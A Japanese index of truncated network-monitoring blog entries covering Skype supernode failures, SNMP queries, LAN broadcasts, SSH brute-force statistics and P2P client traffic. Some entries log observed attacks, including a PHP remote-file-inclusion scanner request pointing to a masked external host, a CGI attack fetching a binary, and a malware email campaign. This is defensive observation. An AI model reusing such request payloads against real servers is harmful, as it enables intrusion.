MIB ".1.3.6.1.2.1.17.4.3.1.1" をnet-snmpのsnmpwalkで取得すると右辺にスイッチが学習したMACアドレスを取得することができるが, スイッチが学習したアドレスの中には取得できないものがある. MACアドレスが全て"20"から"7e"までの間にある場合には, この…

ポート443とポート80およびUDPの不特定番号の大量スキャンが連鎖的に発生. http://d.hatena.ne.jp/naablaa/20101223 http://d.hatena.ne.jp/naablaa/20110103 Skype日本語ブログ http://blogs.skype.com/ja/2011/06/07/skype_signing_in_problem.html 「ごく…

http://blogs.skype.com/en/2010/12/cio_update.html ある程度のスーパーノードが死ぬと, 負荷のタライ回しで連鎖反応が起きスーパーノードネットワークが機能不全になる, 頑健性の無さは基本3年前と同じ. 今まで自動アップデートなかったの? 対策は「今後は…

またスーパーノードが崩壊した. http://d.hatena.ne.jp/naablaa/20070817 http://d.hatena.ne.jp/naablaa/20070818 http://d.hatena.ne.jp/naablaa/20070820 http://d.hatena.ne.jp/naablaa/20070821 http://d.hatena.ne.jp/naablaa/20070823 ポート443とポ…

McAfee Internet Security Suitの一部としてインストールされる. LAN内に存在する機械について地図を作成したり,管理するためのソフトウエア. 状態調査のためにUDPポート138,TCPポート139,TCPポート6646のポートスキャンを行う. TCP6646はMcAfee Network Age…

MacOSXは12分に一度ブロードキャストアドレス(255.255.255.255ではない)のUDPポート137に向ってパケットを放出し,サブネット上のマスタブラウザとなっている全ての機器を検索する. Wiresharkでは"NBNS Name query NB __MSBROWSE__"と表示される. この他に同…

主にストリーム動画に用いられるダウンローダー.速度向上の為かP2P技術を使用している.5倍の高速化が可能と述べられている. http://www.orbitdownloader.com/ インストール時にobinstall.rep.orbitdownloader.com(64.71.134.242)のポート80に以下のようなGET…

mDNS(マルチキャストアドレス224.0.0.251,UDPポート5353)を使用するもの以外に,次のブロードキャストが行われている. UDPポート137 Windowsのプリンタ共有 UDPポート161 SNMPによるデバイス検索.リクエストはSNMPv1, GetRequest .1.3.6.1.2.1.25.3.2.1.2.1(h…

21日11時頃 194.116.131.6(Poland, Pomorskie, Gdansk, Volta, Linux2.4-2.6, 24hop) SSH分散総当り攻撃を仕掛けたIPの一つから,CGIの脆弱性を狙った攻撃が行われる.今回は分散攻撃ではない. 直前にポートスキャンを行わない. barbutというバイナリをダウン…

http://isc.sans.org/port.html?port=22のSources/Dayが増加している. 国名 10/23の攻撃IP数 11/15の攻撃IP数 共通IP数 総IP数 共通IP数の比率 総計 306 310 129 487 26% GERMANY 40 40 11 69 15% UNITED-STATES 26 34 11 49 22% BRAZIL 18 25 7 36 19% POLA…

2007/4から2007/10の期間,観測された4609のIPを/24のネットワークで集約し,バージョン番号等についてもある程度集約した上で集計したもの. バナー ネットワーク数 OpenSSH 455 TTSSH/1 442 PuTTY 422 libssh-0.2 343 WinSCP 249 TTSSH/2 124 libssh-0.1 61 S…

10/25ごろ,212.72.49.131,212.72.49.150,130.117.72.81から204.9.163.158,204.9.163.200に変更されたらしい.

portAdminSpeed(1.3.6.1.4.1.9.5.1.4.1.1.9) 1は自動,他はset port speedで定めた設定速度. http://tools.cisco.com/Support/SNMP/do/BrowseOID.do?local=en&translate=Translate&objectInput=portAdminSpeed portDuplex(1.3.6.1.4.1.9.5.1.4.1.1.10) 1は半2…

リンク Impress ITPro スーパーノードからの返答が異常になったとき,非スーパーノードのログイン要求が止らない状態になるのを回避もしくは抑制する機構が存在していなかった.今も存在していないのかもしれない. ネットワーク資源を保護する機能がないままP2…

Javaで作成されたBitTorrentの一分派.Javaであるためか,Linux,MacOSでも動作. スピード,ピア数の調整機能,IRCクライアント機能,自ファイルの配布を簡単にするEmbedded Tracker機能,機能拡張プラグインなどがある. www.vuse.comにPOSTによるログインアクセス…

16日17時30分頃からSkypeの発生するP2P接続対象のアドレス数が通常の100から1000倍に増加する現象が発生. Windows,MacOS,およびバージョンや言語の区別なく発生.Linuxでも恐らく発生すると思われる.新バージョンがエンバグしているというわけではないらしい …

nForceチップセットにはEtherネットインターフェースが含まれていて,Linux2.6カーネルでこれを駆動しているのはdrivers/net/forcedeth.c nForceチップセットの中にはBIOSが正しくEtherアドレスを返答しないものや他と逆順で返答するものなどがあり,Etherアド…

4月から6月のICMPパケット中確認出来たものの統計. リダイレクト先はhttp://www.viruspool.net/blacklist.cmsによるもの 回数 ドメイン名 リダイレクト先 728 Fix64.com buylicensekey.com 564 www.clean32.com buylicensekey.com 371 www.key32.com buylice…

P2Pストリーミングの一つ.MacOSXにも対応しているらしい. 以下のようなログサーバーと思われるものへのPOSTアクセスを行う. POST //log/normal/ HTTP/1.0 Date: (日付) Host: log.octoshape.net Octoshape-Client: (ユーザー名) Octoshape-Version: L03-N00-…

ICMPパケット内に含まれていた元のポップアップ広告の文面. SYSTEMALERT STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found CRITICAL SYSTEM ERRORS. Run Registry Repair from: http://Fix64.com FAILURE TO ACT NOW MAY LEAD TO DATA LOSS A…

www.file-bank.net(59.134.88.149,日本,KHP059134088149.ppp-bb.dion.ne.jp) be-sp.comと同じ,Apacheを使用 axfc.net 以下のサーバーに分散している www.axfc.net 202.181.99.65 www345.sakura.ne.jp www1.axfc.net 218.228.167.228 218-228-167-228.eonet.n…

Windows Vistaアクティベーションの手順 go.microsoft.comにPOSTメソッドでアクセスする.ID番号は57201,57203,57204,57205.何故か57202はない. ID57201のコードは302(Found)で,実際のライセンスサーバーのURLであるhttps://sls.microsoft.com/slspc/SLActiva…

アップローダーの一つ. 登録なしで300メガバイトまでのアップロードと1日1ギガバイトまでのダウンロードが可能らしい. CGIを介さない直接リンク方式らしい. サーバーはApacheを名乗っている. 38.99.150.0/24の範囲に分散されているらしい. 登録を行うと容量…

9日03時頃からイランと米国の戦争勃発を騙るメールが増え始める. ファイル名はRead More.exe, Read Me.exe, Click Here.exe, Movie.exeなど. MIMEパート冒頭部 --------------070201040801060001060405 Content-Type: application/x-msdownload; name="Click…

PHP系の欠陥を探すスキャナであるらしい.以下のようなヘッダが見られるのでCGIプロキシ状態になっているものを探しているらしい. GET /components/com_simpleboard/image_upload.php?sbp=http://XXX.XXX.XXX.XXX/YYY/ZZZ/ HTTP/1.1 Accept: */* Accept-Langu…

25日18時頃 61.50.138.0/24の範囲にある9個所(China,北京, CNCGROUP Beijing Province Network, China Netcom Group Beijing Corporation,24-25hop)からほぼ同時にICMPエコー要求,ポート80,81,8080,8081,8090,49400,49401にGETリクエストがある. map:x116.38…

skypeがバージョンチェックに行くホスト名. 今までの212.72.49.131と212.72.49.150に加え130.117.72.81が増えたらしい.もっとも古くからある212.72.49.131はネームサーバー登録から外れた? skype起動時に以下のようなHTTPアクセスを行う GET /ui/0/2.5.0.154…

再起動(省電力復帰?)時にLANのブロードキャストアドレス(255.255.255.255ではない)のUDPポート111(RPC)にブロードキャストを行う. Portmap V3 CALLIT Callの後Portmap V2 CALLIT Call,4秒後にこれらを再送.計4パケットが発信される. RPCブロードキャストによ…

15日16時ごろから 暫く前からネームサーバーにICMPパケットを投げ続けていたmozilla.comドメインの3つの機械が,何故か同じネームサーバーのポート80番を叩いてくるようになる(?) 63.245.213.0/24のアドレス範囲にある. http://isc.sans.org/ipinfo.html?ip=6…

skypeの音声通信では1時間に100から150の機械と通信しその数は急激に増減しない. skype起動状態でデフォルトゲートウエイの設定されていない機械が接続されたときのARP発行の様子をgraphvizのdotで視覚化したもの. 赤は本来現れるはずのない外部アドレス.四…